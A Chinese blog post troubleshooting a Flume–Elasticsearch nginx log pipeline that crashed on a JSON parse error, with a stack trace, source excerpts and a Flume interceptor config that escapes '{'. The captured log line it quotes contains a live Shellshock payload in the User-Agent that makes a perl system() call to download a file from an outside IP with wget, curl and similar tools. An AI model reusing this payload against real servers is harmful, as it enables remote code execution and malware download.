flume nginx 日志处理异常 JsonParseException: Unexpected character ('(' (code 40)): expected a valid value

flume nginx 日志处理异常 JsonParseException: Unexpected character (‘(’ (code 40)): expected a valid value

最近flume处理nginx日志,每隔几天就断一次,出现JSON反序列化异常

异常堆栈:

2016/01/26 14:37:49.043 [ERROR] [] [] [SinkRunner-PollingRunner-DefaultSinkProcessor] [org.apache.flume.SinkRunner$PollingRunner.run(SinkRunner.java:160)]  Unable to deliver event. Exception follows.
org.apache.flume.EventDeliveryException: Failed to commit transaction. Transaction rolled back.
    at org.apache.flume.sink.elasticsearch.ElasticSearchSink.process(ElasticSearchSink.java:227)
    at org.apache.flume.sink.DefaultSinkProcessor.process(DefaultSinkProcessor.java:68)
    at org.apache.flume.SinkRunner$PollingRunner.run(SinkRunner.java:147)
    at java.lang.Thread.run(Thread.java:745)
Caused by: org.elasticsearch.common.jackson.core.JsonParseException: Unexpected character ('(' (code 40)): expected a valid value (number, String, array, object, 'true', 'false' or 'null')
 at [Source: [B@78f004c9; line: 1, column: 2]
    at org.elasticsearch.common.jackson.core.JsonParser._constructError(JsonParser.java:1487)
    at org.elasticsearch.common.jackson.core.base.ParserMinimalBase._reportError(ParserMinimalBase.java:518)
    at org.elasticsearch.common.jackson.core.base.ParserMinimalBase._reportUnexpectedChar(ParserMinimalBase.java:447)
    at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser._handleUnexpectedValue(UTF8StreamJsonParser.java:2485)
    at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser._nextTokenNotInObject(UTF8StreamJsonParser.java:801)
    at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser.nextToken(UTF8StreamJsonParser.java:697)
    at org.elasticsearch.common.xcontent.json.JsonXContentParser.nextToken(JsonXContentParser.java:51)
    at org.apache.flume.sink.elasticsearch.ContentBuilderUtil.addComplexField(ContentBuilderUtil.java:60)
    at org.apache.flume.sink.elasticsearch.ContentBuilderUtil.appendField(ContentBuilderUtil.java:47)
    at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.appendHeaders(ElasticSearchLogStashEventSerializer.java:131)
    at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.getContentBuilder(ElasticSearchLogStashEventSerializer.java:80)
    at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.getContentBuilder(ElasticSearchLogStashEventSerializer.java:73)
    at org.apache.flume.sink.elasticsearch.client.ElasticSearchTransportClient.addEvent(ElasticSearchTransportClient.java:164)
    at org.apache.flume.sink.elasticsearch.ElasticSearchSink.process(ElasticSearchSink.java:189)

查找代码

builder.startObject("@fields");
    for (String key : headers.keySet()) {
      byte[] val = headers.get(key).getBytes(charset);
      ContentBuilderUtil.appendField(builder, key, val);
    }

原来是在序列化的时候失败了,ContentBuilderUtil

public static void appendField(XContentBuilder builder, String field,
      byte[] data) throws IOException {
    XContentType contentType = XContentFactory.xContentType(data);
    if (contentType == null) {
      addSimpleField(builder, field, data);
    } else {
      addComplexField(builder, field, contentType, data);
    }
  }

通过 XContentFactory.xContentType(data); 判断数据类型,从上面的异常堆栈判断应该是获取的是JSON类型,在看看里面怎么判断JSON的,有这么银行代码

// a last chance for JSON
for (int i = 0; i < length; i++) {
    if (bytes.get(i) == '{') {
        return XContentType.JSON;
    }
}

唉,怪出问题, 在找找这种处理异常的日志内容

54.204.47.156 - - [2016-01-19T12:50:57+08:00] "GET /index.cgi HTTP/1.1" 301 184 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22 wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  \x22);'" "-" "5.000" "-" "-"

原来userAgent中的字符串中有个{,在加个替换拦截器 search_replace

agent.sources.www.type = exec 
agent.sources.www.command = tail -F -n 0 /data/nginx/logs/www.longdai.com.log
agent.sources.www.restart = true
agent.sources.www.logStdErr = true
agent.sources.www.batchSize = 200
agent.sources.www.channels = fch

agent.sources.www.interceptors = cdn sr www i1 
agent.sources.www.interceptors.www.type = static
agent.sources.www.interceptors.www.key = app
agent.sources.www.interceptors.www.value = www
agent.sources.www.interceptors.cdn.type = regex_filter
agent.sources.www.interceptors.cdn.regex = .*\\s+\\"ChinaCache\\"\\s+.*
agent.sources.www.interceptors.cdn.excludeEvents = true

agent.sources.www.interceptors.sr.type=search_replace
agent.sources.www.interceptors.sr.searchPattern=\\{
agent.sources.www.interceptors.sr.replaceString=%7b
agent.sources.www.interceptors.sr.charset=UTF-8

agent.sources.www.interceptors.i1.type = regex_extractor
agent.sources.www.interceptors.i1.regex = ([^\\s]*)\\s-\\s([^\\s]*)\\s\\[(.*)\\]\\s+\\"([\\S]*)\\s+([\\S]*)\\s+[\\S]*\\"\\s+(\\d+)\\s+(\\d+)\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"
agent.sources.www.interceptors.i1.serializers = s1 s2 s3 s4 s5 s6 s7 s8 s9 s10 s11 s12 s13
agent.sources.www.interceptors.i1.serializers.s1.name = remote_addr
agent.sources.www.interceptors.i1.serializers.s2.name = remote_user
agent.sources.www.interceptors.i1.serializers.s3.name = datetime
#agent.sourceswwwi.interceptors.i1.serializers.s3.type = org.apache.flume.interceptor.RegexExtractorInterceptorMillisSerializer
#agent.sourceswwwi.interceptors.i1.serializers.s3.name = timestamp
#agent.sourceswwwi.interceptors.i1.serializers.s3.pattern  = yyyy-MM-dd'T'HH:mm:ssZ
agent.sources.www.interceptors.i1.serializers.s4.name = http_method
agent.sources.www.interceptors.i1.serializers.s5.name = uri
agent.sources.www.interceptors.i1.serializers.s6.name = status
agent.sources.www.interceptors.i1.serializers.s7.name = body_length
agent.sources.www.interceptors.i1.serializers.s8.name = http_referer
agent.sources.www.interceptors.i1.serializers.s9.name = user_agent
agent.sources.www.interceptors.i1.serializers.s10.name = http_x_forwarded_for
agent.sources.www.interceptors.i1.serializers.s11.name = request_time
agent.sources.www.interceptors.i1.serializers.s12.name = upstream_addr
agent.sources.www.interceptors.i1.serializers.s13.name = upstream_response_time

agent.sources.www.interceptors.i2.type = timestamp
agent.sources.www.interceptors.i3.type = host
agent.sources.www.interceptors.i3.hostHeader = hostname


agent.sinks.elasticSearch.type = org.apache.flume.sink.elasticsearch.ElasticSearchSink
agent.sinks.elasticSearch.channel = fch
agent.sinks.elasticSearch.batchSize = 2000
agent.sinks.elasticSearch.hostNames = 172.16.0.18:9300
agent.sinks.elasticSearch.indexName = nginx
agent.sinks.elasticSearch.indexType = nginx
agent.sinks.elasticSearch.clusterName = longdai 
agent.sinks.elasticSearch.client = transport
agent.sinks.elasticSearch.serializer = org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer

flume处理nginx日志的配置可以查看这里

http://blog.csdn.net/lanmo555/article/details/50483561

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值